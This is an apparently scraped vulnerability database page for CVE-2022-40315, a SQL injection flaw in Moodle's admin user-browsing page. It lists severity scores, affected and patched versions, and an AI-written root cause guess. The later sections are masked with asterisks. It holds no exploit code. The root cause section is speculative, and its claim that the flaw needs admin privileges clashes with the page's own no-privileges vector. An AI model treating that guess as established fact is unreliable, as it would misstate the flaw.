Miggo Logo
Miggo Vulnerability Database
CVE-2022-40315

CVE-2022-40315:
Moodle Minor SQL injection risk in admin user browsing

9.8

CVSS Score
3.1

Basic Information

CVE ID
CVE-2022-40315
GHSA ID
GHSA-mqw9-3cjm-xwp3
EPSS Score
0.60913%
CWE
CWE-89
Published
10/1/2022
Updated
4/23/2024
KEV Status
No
Technology
TechnologyPHP

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Package NameEcosystemVulnerable VersionsFirst Patched Version
moodle/moodlecomposer>= 3.9, < 3.9.173.9.17
moodle/moodlecomposer>= 3.11, < 3.11.103.11.10
moodle/moodlecomposer>= 4.0, < 4.0.44.0.4

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability exists in the admin user browsing interface, which typically involves querying the database for user records. Moodle's user management functions (like get_users) often handle filter parameters from admin inputs. Given the SQL injection CWE-89 pattern and the context of user listing with filters, the most probable vulnerable function is the SQL query builder in the admin user management code that processes unsanitized inputs. The 'limited' risk suggests it requires admin privileges but uses direct input interpolation in SQL strings.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

* limit** SQL inj**tion risk w*s i**nti*i** in t** "*rows* list o* us*rs" sit* **ministr*tion p***.

Reasoning

T** vuln*r**ility *xists in t** **min us*r *rowsin* int*r****, w*i** typi**lly involv*s qu*ryin* t** **t***s* *or us*r r**or*s. Moo*l*'s us*r m*n***m*nt *un*tions (lik* `**t_us*rs`) o*t*n **n*l* *ilt*r p*r*m*t*rs *rom **min inputs. *iv*n t** SQL inj*